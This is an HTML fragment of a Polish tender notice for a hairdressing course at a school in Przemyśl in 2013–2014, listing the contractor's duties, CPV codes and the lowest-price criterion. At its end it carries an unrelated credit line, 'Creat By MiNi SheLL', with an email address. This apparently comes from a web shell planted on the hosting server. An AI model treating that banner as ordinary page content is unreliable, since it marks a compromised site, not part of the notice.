<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs z nowoczesnych technik fryzjerskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Realizacja ww. zajęć kursowych odbywać się będzie w siedzibie ZSHiG przy ul. Bakończyckiej 11 w Przemyślu, przez czas trwania umowy, w terminach uzgodnionych 
z dyrekcją szkoły w systemie piątkowo - sobotnio - niedzielnym (dotyczy zadań częściowych nr 1, 2 i 3) i sobotnio - niedzielnym (dotyczy zadania częściowego nr 4), w wymiarze godzin przewidzianych dla każdej grupy uczniów, zgodnie z założeniami projektu, bezpośrednio przed lub po zajęciach określonych planem lekcji i zajęć pozalekcyjnych, w których uczniowie już uczestniczą. Zmiana godzin jest dopuszczalna jedynie za wcześniejszą pisemną zgodą dyrekcji szkoły.
2. Zajęcia prowadzone będą od września 2013 r. do 30 czerwca 2014 r. 
3. Zajęcia kursowe zostaną przeprowadzone zgodnie z programem zajęć przedstawionym w załączniku nr 1 do SIWZ.
4. Wykonawca uzgodni z Dyrekcją Szkoły harmonogram planowanych do prowadzenia zajęć kursowych i przedłoży do Zamawiającemu zgodnie z postanowieniami umowy.
5. Wykonawca w toku prowadzonych zajęć będzie w sposób systematyczny prowadził dokumentację związaną z prowadzeniem danej części zajęć tj. listy obecności, dzienniku zajęć, oceny postępu wraz z określeniem uczniów osiągających najwyższe wyniki, na podstawie przeprowadzonych testów, ćwiczeń a także inne dokumenty niezbędne dla potrzeb realizacji projektu (np. kart obserwacji i innej dokumentacji dotyczącej mierzenia wskaźników pomiaru celu projektu zapisanych we wniosku o dofinansowanie).
6. Przygotowania i sporządzenia w formie elektronicznej i papierowej sprawozdania (sprawozdań) danego rodzaju zajęć i działań wynikających z projektu, w którym zawarte będzie okresowe porównanie wyników osiąganych przez uczniów.
7. Wykonawca zobowiązany jest do ścisłej współpracy z Zamawiającym.
8. Po zakończeniu zajęć kursowych Wykonawca wyda stosowne dokumenty świadczące 
o ukończeniu kursu np. zaświadczenie zawierające dane uczestnika kursu, tematykę kursu, liczbę godzin przypadająca na poszczególne tematy w ramach prowadzonych zajęć.
9. Program tematyczny poszczególnych zajęć kursowych oraz wymagania jakie ma spełnić Wykonawca zawarte są  w załącznikach na 1 i 1 A do SIWZ, a pozostałe zobowiązania zawarte są we wzorze umowy.
10. Materiały szkoleniowe, pomoce dydaktyczne dla uczniów umożliwiające przeprowadzenie wymienionych w pkt 1 zajęć kursowych zabezpiecza Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8, 80.51.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com